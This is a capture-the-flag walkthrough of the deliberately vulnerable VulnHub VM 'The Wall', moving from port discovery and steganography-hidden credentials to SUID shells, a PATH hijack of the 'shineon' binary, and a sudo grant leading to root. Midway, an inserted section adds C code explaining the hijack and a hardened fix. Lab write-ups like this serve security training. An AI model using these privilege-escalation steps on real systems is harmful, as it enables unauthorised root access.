The Wall VulnHub Writeup

  1. Sydd
  2. Roger
  3. The Wall
  4. Nick Mason
  5. Richard Wright
  6. David Gilmour
  7. 50 Years of the Floyd
  8. Conclusion

Xerubus released a new VM recently, named 'The Wall', in tribute to 50 years of Pink Floyd. This is my writeup for it - let's get started!

First things first, an nmap scan. Nada.

I fire up Wireshark and filter on the target's IP address. I notice that every 10 seconds the target attempts to connect back to us on port 1337. My guess is there's some sort of host discovery or connect-back mechanism running on the target.

After listening on port 1337 on my test machine, I wait a few seconds and get a connect back.

$ nc -v -l 0.0.0.0 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.57.104] port 1337 [tcp/*] accepted (family 2, sport 32762)

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   

              The Wall by @xerubus
          -= Welcome to the Machine =-

If you should go skating on the thin ice of modern life, dragging behind you the silent reproach of a million tear-stained eyes, don't be surprised when a crack in the ice appears under your feet. - Pink Floyd, The Thin Ice

We simply get kicked out after this message. Checking Wireshark again, I note that an HTTP request was made. I got lucky here: I had attempted to visit the target while nmap was running, and it just so happens that the browser kept retrying (every so often) after the first failed attempt.

After visiting port 80, I get a heart-warming image presented to me.

Dawwwh - look at their little faces. I find nothing of interest in the image.

I note from the HTTP response that the server is apparently running on OpenBSD.

HTTP/1.1 200 OK
Connection: keep-alive
Content-Length: 539
Content-Type: text/html
Date: Fri, 27 Nov 2015 19:37:53 GMT
Last-Modified: Sat, 24 Oct 2015 15:20:23 GMT
Server: OpenBSD httpd

I check the source of the page.

<html>
<body bgcolor="#000000">
<center><img src="pink_floyd.jpg"</img></center>
</body>
</html>


<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album.  Publius promised an unspecified reward for solving the
riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035-->

That last string looks like a hex value. After decoding, I get the following.

steg=33115730dbbb370fcbe9720fe632ec05

Another hex value. The key 'steg' stands out. The only other piece of evidence we have so far is the image. I'm guessing there's some information hidden in the image, and this is the key to retrieving it.

The value above looks like an MD5 hash. After putting it into CrackStation, I get a single hit - the phrase 'divisionbell'. I use this as the passphrase for steghide to extract information from the JPG.

$ steghide extract -p divisionbell -sf evidence-1.jpg
wrote extracted data to "pink_floyd_syd.txt".
$ cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars?

If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.  The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.

Awesome. So, we've now got a Base64-encoded string (which decodes to 'SydBarrett') and another MD5 hash (which gives a single hit of 'pinkfloydrocks'). The only place we can currently provide a login is the web server, so I attempt to pass the username 'SydBarrett' with the password 'pinkfloydrocks' as a basic auth pair.

After prodding about, I see that all PHP files appear to return a 403 error. I attempted to provide the login as a basic auth pair but didn't receive a challenge, so I'm guessing this error is due to file permissions rather than an htpasswd rule.

Running out of options, I decide to run another nmap scan. It really doesn't feel like these credentials can be used on the web server.

$ nmap -p0-65535 -sT -T5 -A -v 192.168.57.104

Starting Nmap 7.00 ( https://nmap.org ) at 2015-11-27 22:32 GMT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating NSE at 22:32
Completed NSE at 22:32, 0.00s elapsed
Initiating ARP Ping Scan at 22:32
Scanning 192.168.57.104 [1 port]
Completed ARP Ping Scan at 22:32, 0.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:32
Completed Parallel DNS resolution of 1 host. at 22:32, 13.00s elapsed
Initiating Connect Scan at 22:32
Scanning 192.168.57.104 [65536 ports]
Discovered open port 80/tcp on 192.168.57.104
Discovered open port 1965/tcp on 192.168.57.104
Completed Connect Scan at 22:33, 54.18s elapsed (65536 total ports)
Initiating Service scan at 22:33
Scanning 2 services on 192.168.57.104
Completed Service scan at 22:35, 96.12s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.57.104
NSE: Script scanning 192.168.57.104.
Initiating NSE at 22:35
Completed NSE at 22:35, 7.21s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Nmap scan report for 192.168.57.104
Host is up (0.0017s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    OpenBSD httpd
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).
1965/tcp open  ssh     OpenSSH 7.0 (protocol 2.0)
| ssh-hostkey:
|   2048 70:26:15:de:7b:29:9a:56:a3:eb:33:e0:7e:fb:92:d8 (RSA)
|_  256 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a (ECDSA)
MAC Address: 08:00:27:F2:2B:B7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 5.X
OS CPE: cpe:/o:openbsd:openbsd:5
OS details: OpenBSD 5.0 - 5.4
Uptime guess: 0.000 days (since Fri Nov 27 22:35:22 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Randomized

TRACEROUTE
HOP RTT     ADDRESS
1   1.72 ms 192.168.57.104

NSE: Script Post-scanning.
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Initiating NSE at 22:35
Completed NSE at 22:35, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.42 seconds
           Raw packets sent: 47 (4.644KB) | Rcvd: 11 (612B)

What's that - port 1965 is open, and it's an SSH server? Jackpot.

$ ssh -p 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.57.104 closed.

Crap..

Sydd

So we've got a valid login for the system, but it only supports SFTP access. Let's have a sniff around.

$ sftp -P 1965 SydBarrett@192.168.57.104
SydBarrett@192.168.57.104's password:
Connected to 192.168.57.104.
sftp> ls -alh
drwxr-x---    0 0        1000         512B Oct 24 21:16 .
drwxr-x---    0 0        1000         512B Oct 24 21:16 ..
drwxr-xr-x    0 0        1000         512B Oct 24 19:17 .mail
-rw-r--r--    0 0        1000         1.9K Oct 25 22:56 bio.txt
-rw-r--r--    0 0        1000         849K Oct 24 17:17 syd_barrett_profile_pic.jpg
sftp> ls -alh .mail
drwxr-xr-x    0 0        1000         512B Oct 24 19:17 .mail/.
drwxr-x---    0 0        1000         512B Oct 24 21:16 .mail/..
drwxr-xr-x    0 0        1000         512B Nov 11 10:25 .mail/.stash
-rw-r--r--    0 0        1000         309B Oct 24 19:18 .mail/sent-items
sftp> ls -alh .mail/.stash
drwxr-xr-x    0 0        1000         512B Nov 11 10:25 .mail/.stash/.
drwxr-xr-x    0 0        1000         512B Oct 24 19:17 .mail/.stash/..
-rw-r--r--    0 0        1000        46.6M Aug  7 15:33 .mail/.stash/eclipsed_by_the_moon
sftp> ls -alh .mail/sent-items
-rw-r--r--    0 0        1000         309B Oct 24 19:18 .mail/sent-items

There are a few files we can check out here. I download them all and get to work.

bio.txt unsurprisingly has a biography of Syd Barrett, and the JPG is a picture of the good man himself.

The file eclipsed_by_the_moon, however, is an archive.

$ file eclipsed_by_the_moon
eclipsed_by_the_moon: gzip compressed data, last modified: Wed Nov 11 00:15:47 2015, from Unix

Within this gzip is a tar.. a tar.gz, one might say.

$ tar zxvf eclipsed_by_the_moon.tar.gz
eclipsed_by_the_moon.lsd
$ file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector

So we've got a file system image here. I use foremost to carve out anything of interest.

$ foremost -v eclipsed_by_the_moon.lsd
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Fri Nov 27 22:53:46 2015
Invocation: foremost -v eclipsed_by_the_moon.lsd
Output directory: /home/test/Downloads/wall/eclipsed_by_the_moon.exc/output
Configuration file: /etc/foremost.conf
Processing: eclipsed_by_the_moon.lsd
|------------------------------------------------------------------
File: eclipsed_by_the_moon.lsd
Start: Fri Nov 27 22:53:46 2015
Length: 47 MB (49283072 bytes)

Num     Name (bs=512)           Size     File Offset     Comment

0:    00000418.jpg          123 KB          214016      
*|
Finish: Fri Nov 27 22:53:47 2015

1 FILES EXTRACTED

jpg:= 1
------------------------------------------------------------------

Foremost finished at Fri Nov 27 22:53:47 2015

Foremost managed to extract a single file - an image.

It's Roger! And there's our password - hello_is_there_anybody_in_there.

$ ssh -p1965 RogerWaters@192.168.57.104
RogerWaters@192.168.57.104's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'   
$

Roger

What does Mr Waters keep in his home directory, I wonder..

$ ls -alh
total 176
drwx------  3 RogerWaters  RogerWaters   512B Oct 28 09:29 .
drwxr-xr-x  7 root         wheel         512B Oct 24 17:36 ..
-rw-r--r--  1 RogerWaters  RogerWaters    87B Oct 24 17:35 .Xdefaults
-rw-r--r--  1 RogerWaters  RogerWaters   773B Oct 24 17:35 .cshrc
-rw-r--r--  1 RogerWaters  RogerWaters   103B Oct 24 17:35 .cvsrc
-rw-r--r--  1 RogerWaters  RogerWaters   398B Oct 26 04:01 .login
-rw-r--r--  1 RogerWaters  RogerWaters   175B Oct 24 17:35 .mailrc
-rw-r--r--  1 RogerWaters  RogerWaters   218B Oct 24 17:35 .profile
drwx------  2 RogerWaters  RogerWaters   512B Oct 26 03:56 .ssh
-rw-r--r--  1 RogerWaters  RogerWaters   2.8K Oct 26 08:57 bio.txt
-rw-r--r--  1 RogerWaters  RogerWaters     0B Oct 28 05:02 mbox
-rw-r--r--  1 RogerWaters  RogerWaters  47.0K Oct 26 06:16 roger_waters_profile_pic.jpg
-rw-r--r--  1 RogerWaters  RogerWaters  16.2K Oct 26 06:23 secret-diary

After some time digging through Roger's personal items, I check out the other users on the system - no surprises here.

$ ls -lah /home
total 28
drwxr-xr-x   7 root           wheel           512B Oct 24 17:36 .
drwxr-xr-x  13 root           wheel           512B Oct 24 18:03 ..
drwx------   4 DavidGilmour   DavidGilmour    512B Oct 28 09:28 DavidGilmour
drwx------   3 NickMason      NickMason       512B Aug  8 00:33 NickMason
drwx------   3 RichardWright  RichardWright   512B Nov 27 02:02 RichardWright
drwx------   3 RogerWaters    RogerWaters     512B Oct 28 09:29 RogerWaters
drwxr-xr-x   4 root           SydBarrett      512B Oct 24 18:03 SydBarrett

What was a nice surprise is that two of these users own binaries with the SUID bit set.

$ find / -user NickMason 2>/dev/null     
/home/NickMason
/usr/local/bin/brick
$ ls -lah /usr/local/bin/brick
-rws--s--x  1 NickMason  NickMason   7.1K Aug  8 00:33 /usr/local/bin/brick
$ find / -user DavidGilmour 2>/dev/null
/home/DavidGilmour
/usr/local/bin/shineon
$ ls -lah /usr/local/bin/shineon
-rwsr-s---  1 DavidGilmour  RichardWright   7.3K Oct 25 07:58 /usr/local/bin/shineon

Looks like we've got our next step. Seeing as we're only able to execute one of these binaries (brick is world-executable, while shineon is restricted to the RichardWright group), let's move on.

The Wall

I go ahead and execute /usr/local/bin/brick.

$ /usr/local/bin/brick




What have we here, laddie?
Mysterious scribbings?
A secret code?
Oh, poems, no less!
Poems everybody!




Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ whoami
NickMason

Well, that was unexpected, but welcome. We're now one with Nick.

Nick Mason

After logging in, I have a bit of a dig about.

$ ls -alh /home/NickMason/
total 1576
drwx------  3 NickMason  NickMason   512B Aug  8 00:33 .
drwxr-xr-x  7 root       wheel       512B Oct 24 17:36 ..
-rw-r--r--  1 NickMason  NickMason    87B Oct 24 17:34 .Xdefaults
-rw-r--r--  1 NickMason  NickMason   773B Oct 24 17:34 .cshrc
-rw-r--r--  1 NickMason  NickMason   103B Oct 24 17:34 .cvsrc
-rw-r--r--  1 NickMason  NickMason   398B Oct 24 17:34 .login
-rw-r--r--  1 NickMason  NickMason   175B Oct 24 17:34 .mailrc
-rw-r--r--  1 NickMason  NickMason   218B Oct 24 17:34 .profile
drwx------  2 NickMason  NickMason   512B Oct 28 04:48 .ssh
-rw-r--r--  1 NickMason  NickMason   1.3K Oct 26 08:58 bio.txt
-rw-r--r--  1 NickMason  NickMason     0B Oct 28 05:02 mbox
-rw-r--r--  1 NickMason  NickMason   749K Aug  8 00:33 nick_mason_profile_pic.jpg
$ cat bio.txt
"Nicholas Berkeley "Nick" Mason (born 27 January 1944) is an English musician and composer, best known as the drummer of Pink Floyd. He is the only constant member of the band since its formation in 1965. Despite solely writing only a few Pink Floyd songs, Mason has co-written some of Pink Floyd's most popular compositions such as "Echoes" and "Time".

Mason is the only Pink Floyd member to be featured on every one of their albums. It is estimated that as of 2010, the group have sold over 250 million records worldwide,[1][2] including 75 million units sold in the United States.

He competes in auto racing events, such as the 24 Hours of Le Mans.

On 26 November 2012, Mason received an Honorary Doctor of Letters from the University of Westminster at the presentation ceremony of the School of Architecture and Built Environment (he had studied architecture at the University's predecessor, Regent Street Polytechnic, 1962-1967)."

I wander if anyone is reading these bio's?  Richard Wright.. if you're reading this, I'm not really going to cut you into little pieces.  I was just having a joke.  Anyhow, I have now added you to thewall.  You're username is obvious. You'll find your password in my profile pic.

Source: Wikipedia (https://en.wikipedia.org/wiki/Nick_Mason)

Read that bio carefully..yeah..

I copy out the profile image and try to open it up.. turns out it is not a profile pic at all.

$ file nick_mason_profile_pic.jpg
nick_mason_profile_pic.jpg: Ogg data, Vorbis audio, stereo, 44100 Hz, ~160000 bps, created by: Xiph.Org libVorbis I

evidence-4.ogg

After listening to the playback, I can hear some Morse code in the background.

.-. .. -.-. .... .- .-. -.. .-- .-. .. --. .... - .---- ----. ....- ...-- ..-. .- .-. ..-. .. ... .-

This translates to..

RICHARDWRIGHT1943FARFISA

After a number of attempts, I hit on the right password for the user - 1943farfisa. Annoyingly, you cannot SSH in as RichardWright - you can only su to it from another user on the system.

Richard Wright

Before we check out the binary we found previously, I have a sniff around Richard's home directory.

$ ls -alh
total 84
drwx------  3 RichardWright  RichardWright   512B Nov 27 02:02 .
drwxr-xr-x  7 root           wheel           512B Oct 24 17:36 ..
-rw-r--r--  1 RichardWright  RichardWright    87B Oct 24 17:35 .Xdefaults
-rw-r--r--  1 RichardWright  RichardWright   773B Oct 24 17:35 .cshrc
-rw-r--r--  1 RichardWright  RichardWright   103B Oct 24 17:35 .cvsrc
-rw-r--r--  1 RichardWright  RichardWright   398B Oct 24 17:35 .login
-rw-r--r--  1 RichardWright  RichardWright   175B Oct 24 17:35 .mailrc
-rw-r--r--  1 RichardWright  RichardWright   218B Oct 24 17:35 .profile
drwx------  2 RichardWright  RichardWright   512B Oct 28 09:29 .ssh
-rw-r--r--  1 RichardWright  RichardWright   2.2K Oct 26 09:00 bio.txt
-rw-r--r--  1 RichardWright  RichardWright   990B Oct 27 01:46 mbox
-rw-r--r--  1 RichardWright  RichardWright  17.8K Oct 27 01:52 richard_wright_profile_pic.jpg

The bio contains standard stuff, and the profile picture..well, it's a profile picture.

It appears that Richard has mail.

$ cat mbox
From DavidGilmour@thewall.localdomain Tue Oct 27 01:41:18 2015
Return-Path: DavidGilmour@thewall.localdomain
Delivered-To: RichardWright@thewall.localdomain
Received: from localhost (thewall.localdomain [local])
        by thewall.localdomain (OpenSMTPD) with ESMTPA id 3ad74b19
        for <RichardWright@thewall.localdomain>;
        Tue, 27 Oct 2015 01:41:18 +1000 (AEST)
From: David Gilmour <DavidGilmour@thewall.localdomain>
Date: Tue, 27 Oct 2015 02:41:18 +1000 (AEST)
Message-Id: <9059884549097248741.enqueue@thewall.localdomain>
To: RichardWright@thewall.localdomain
Subject: Re: Brain Damage
Status: RO

G'day Rick.. how's the ivory tickling going?

There's plenty of bricks in the wall, so I'll give you a few when we catch up.

For now, just use that command I gave you with the menu.

Dave

----------

Hey Dave,
I feel like we're back in the studio for The Dark Side of the Moon.
Sorry to keep bugging you, but can you tell me again how to do things
when I'm on thewall.
Rick

This email references a command - I'm guessing that's the binary we found earlier. Let's check it out.

$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit

Running strings on the binary shows that every menu command is invoked by an absolute path except one: mail is called by bare name, so it is resolved through the caller's PATH. A rather crude way of finding the vulnerability, but effective.

$ strings /usr/local/bin/shineon
/usr/libexec/ld.so
OpenBSD
OpenBSD
libc.so.80.1
printf
__stack_smash_handler
__srget
getc
puts
system
_thread_atfork
environ
__progname
__cxa_atexit
__sF
__isthreaded
scanf
_Jv_RegisterClasses
__got_start
__got_end
__data_start
_edata
__bss_start
__progname_storage
__fini
__init_tcb
QRP1
[^_]
Menu
1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
Quitting program!
Invalid choice!
load_menu
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail

Creating a symbolic link named mail in /tmp, then putting /tmp at the front of PATH, I can get a shell as David Gilmour.

$ ln -s /bin/sh /tmp/mail           
$ export PATH=/tmp:$PATH
$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
mail: Cannot determine current working directory
$ cd
mail: cd: /home/RichardWright - Permission denied
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
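To make the shineon weakness concrete, the following is an added example of mine, not code from the writeup or from the VM (whose source isn't available): resolve_in_path shows how /bin/sh turns a bare 'mail' into whatever PATH says first, install_fake_mail builds a throwaway decoy directory for the demo, and run_pinned is the hardened handler a setuid program should use instead. That shineon hands a bare 'mail' to system() is inferred from the strings output above, and /usr/bin/mail in check_mail_hardened is an assumed location.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Resolve a bare command name the way /bin/sh does for system("mail"):
 * walk PATH left to right and take the first executable that exists.
 * An empty entry means the current directory. Returns 1 and fills out
 * with the winning path, or 0 (out emptied) if nothing matched. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outsz)
{
    const char *p = path ? path : "";
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        int n = len ? snprintf(out, outsz, "%.*s/%s", (int)len, p, cmd)
                    : snprintf(out, outsz, "./%s", cmd);
        if (n > 0 && (size_t)n < outsz && access(out, X_OK) == 0)
            return 1;
        if (colon == NULL)
            break;
        p = colon + 1;
    }
    if (outsz)
        out[0] = '\0';
    return 0;
}

/* Demo helper: create a throwaway directory holding an executable named
 * "mail", standing in for the decoy the writeup links into /tmp. dir
 * receives the directory path. Returns 0 on success, -1 on failure. */
int install_fake_mail(char *dir, size_t dirsz)
{
    char path[4096];
    FILE *f;
    int n = snprintf(dir, dirsz, "/tmp/hijack-demo-%ld", (long)getpid());
    if (n <= 0 || (size_t)n >= dirsz)
        return -1;
    if (mkdir(dir, 0700) != 0 && errno != EEXIST)
        return -1;
    snprintf(path, sizeof path, "%s/mail", dir);
    if ((f = fopen(path, "w")) == NULL)
        return -1;
    fputs("#!/bin/sh\nexit 0\n", f);
    fclose(f);
    return chmod(path, 0755);
}

/* The pattern the strings output points at: every other menu item names
 * an absolute path, but "Check Mail" hands a bare name to system(), so
 * whoever controls PATH chooses what runs under the setuid owner's euid.
 * Shown for contrast only; nothing in this example calls it. */
void check_mail_vulnerable(void)
{
    system("mail");
}

/* Hardened replacement: accept only an absolute path, skip the shell,
 * give the child a fixed environment (so PATH, IFS, ENV and friends from
 * the caller are discarded) and drop the setuid/setgid privilege before
 * it execs. Returns the child's exit status, or -1 on refusal/failure. */
int run_pinned(char *const argv[])
{
    static char *const envp[] = { "PATH=/bin:/usr/bin", NULL };
    pid_t pid;
    int status;

    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/')
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execve(argv[0], argv, envp);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* What the "4. Check Mail" handler looks like with the fix applied.
 * /usr/bin/mail is an assumed location for the mail client. */
int check_mail_hardened(void)
{
    char *const argv[] = { "/usr/bin/mail", NULL };
    return run_pinned(argv);
}
```

With the decoy directory first in PATH, resolve_in_path picks the decoy's mail over the system one, which is exactly the ordering the writeup exploits; run_pinned never consults PATH at all.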

On to the man of the hour.

David Gilmour

Once again, I check out his home directory.

$ cd /home/DavidGilmour/
$ ls -lah
total 408
drwx------  4 DavidGilmour  DavidGilmour   512B Oct 28 09:28 .
drwxr-xr-x  7 root          wheel          512B Oct 24 17:36 ..
-rw-r--r--  1 DavidGilmour  DavidGilmour    87B Oct 24 17:36 .Xdefaults
-rw-r--r--  1 DavidGilmour  DavidGilmour   773B Oct 24 17:36 .cshrc
-rw-r--r--  1 DavidGilmour  DavidGilmour   103B Oct 24 17:36 .cvsrc
-rw-r--r--  1 DavidGilmour  DavidGilmour   398B Oct 24 17:36 .login
-rw-r--r--  1 DavidGilmour  DavidGilmour   175B Oct 24 17:36 .mailrc
drwx------  2 DavidGilmour  DavidGilmour   512B Oct 26 11:44 .private
-rw-r--r--  1 DavidGilmour  DavidGilmour   218B Oct 24 17:36 .profile
drwx------  2 DavidGilmour  DavidGilmour   512B Oct 28 05:16 .ssh
-rw-------  1 DavidGilmour  DavidGilmour   384B Aug  8 00:33 anotherbrick.txt
-rw-r--r--  1 DavidGilmour  DavidGilmour  1022B Oct 26 08:59 bio.txt
-rwxr-----  1 DavidGilmour  DavidGilmour   178K Oct 28 08:50 david_gilmour_profile_pic.jpg
-rw-r--r--  1 DavidGilmour  DavidGilmour   785B Oct 27 01:43 mbox

There's nothing of real interest here, apart from the file anotherbrick.txt.

$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review:    pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs

Upon reflection, we could have bypassed these steps entirely by reading this path from /etc/httpd.conf.org, but that wouldn't have been any fun now, would it?

As a matter of procedure, I check the profile image for strings.

who_are_you_and_who_am_i

This looks like a password to me. I try to use it to login as DavidGilmour.

$ login
login: DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

Let's move on to this URL.

50 Years of the Floyd

Upon visiting the URL, we're presented with a lovely page, dedicated to 50 Years of Pink Floyd.

The menu items here link to index.php, with a parameter of 'page'.

<li><a href="?page=home">Home</a></li>
<li><a href="?page=about">About</a></li>
<li><a href="?page=albums">Albums</a></li>
<li><a href="?page=contact">Contact</a></li>

My first guess is an LFI vulnerability. After numerous attempts, I move away from the web application, as I can't seem to get anything of use out of it.

I start exploring the filesystem, including the web root, and find a previously unknown directory named 'welcometothemachine'.

$ ls -alh /var/www/htdocs/welcometothemachine
total 24
drwxr-xr-x  2 root  welcometothemachine   512B Aug  8 00:33 .
drwxr-x---  4 www   welcometothemachine   512B Nov 27 01:47 ..
-rws--s---  1 root  welcometothemachine   7.3K Nov 27 01:47 PinkFloyd

OK - all we can do is run this binary.

$ /var/www/htdocs/welcometothemachine/PinkFloyd
/var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: test

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh

Either we need to exploit this, or we need to guess the password.

After some probing, it appears to crash after receiving more than 50 characters of input.

Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
Abort trap

Unfortunately, an abort would normally leave a core dump to inspect, but the sysctl that prevents core dumps from SUID binaries is enabled.

$ sysctl kern.nosuidcoredump   
kern.nosuidcoredump=1

I was stuck on this stage for quite some time. After going back over my notes, and checking all the evidence, I noticed that I hadn't actually taken a look at the image from the last web page.

I found nothing of interest in the EXIF data, but I noticed an abnormality at the bottom of the image. After adjusting the levels slightly in GIMP, we see the following.

My first thought was that this was an MD5 hash, but it is actually the hex encoding of a string.

50696e6b466c6f796435305965617273 = PinkFloyd50Years

I try using this as the password for the above binary, but receive the same denial message. I proceed to try the hex string itself, and am met by a different message!

$ /var/www/htdocs/welcometothemachine/PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!

Unsure as to what this actually did, I look for any files modified within the past 10 minutes.

$ find / -mmin -10 2>/dev/null
/home/RogerWaters
/dev/bpf0
/dev/ttyp0
/dev/ptyp0
/dev/null
/etc/sudoers
/var/cron/log
/var/db/dhclient.leases.pcn0
/var/log/daemon
/var/log/messages

So the sudoers file has been updated. I re-check our sudo permissions.

$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL

Boo-ya! We can use sudo to execute any command as any user. Time to get our flag.

$ sudo su
# cd /root
# ls -lah
total 48
drwx------   5 root  wheel   512B Nov 27 02:04 .
drwxr-xr-x  14 root  wheel   512B Oct 24 18:03 ..
-rw-r--r--   1 root  wheel    87B Aug 16 18:25 .Xdefaults
-rw-r--r--   1 root  wheel   578B Aug 16 18:25 .cshrc
-rw-r--r--   1 root  wheel    94B Aug 16 18:25 .cvsrc
-rw-r--r--   1 root  wheel   328B Aug 16 18:25 .login
-rw-r--r--   1 root  wheel   468B Aug 16 18:25 .profile
drwx------   2 root  wheel   512B Nov 27 05:01 .ssh
-rw-r--r--   1 root  wheel   2.7K Nov 27 01:07 flag.txt
drwxr-xr-x   2 root  wheel   512B Nov 14 02:43 scripts
drwxr-xr-x   2 root  wheel   512B Oct 27 03:10 tmp
# cat flag.txt

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"

                   Congratulations on rooting thewall!

   ___________________________________________________________________
  | |       |       |       |       |       |       |       |       | |
  |_|_______|_______|______ '__  ___|_______|_______|_______|_______|_|
  |     |       |       |   |  )      /         |       |       |     |
  |_____|_______|_______|__ |,' , .  | | _ , ___|_______|_______|_____|
  | |       |       |      ,|   | |\ | | ,' |       |       |       | |
  |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
  |     |       |       |   \  _' '  ` |  \     |       |       |     |
  |_____|_______|_______|_  ,-'_ _____ | _______|_______|_______|_____|
  | |       |       |   ,-'|  _     |       |       |       |       | |
  |_|_______|_______|__  ,-|-' |  ,-. \ /_.--. _____|_______|_______|_|
  |     |       |          |   |  | |  V  |   ) |       |       |     |
  |_____|_______|_______|_ | _ |-'`-'  |  | ,' _|_______|_______|_____|
  | |       |       |      |        |  '  ;'        |       |       | |
  |_|_______|_______|______"|_____  _,- o'__|_______|_______|_______|_|
  |     |       |       |       _,-'    .       |       |       |     |
  |_____|_______|_______|_ _,--'\      _,-'_____|_______|_______|_____|
  | |       |       |     '     ||_||-' _   |       |       |       | |
  |_|_______|_______|_______|__ || ||,-'  __|_______|_______|_______|_|
  |     |       |       |       |  ||_,-'       |       |       |     |
  |_____|_______|______.|_______.__  ___|_______|_______|_______|_____|
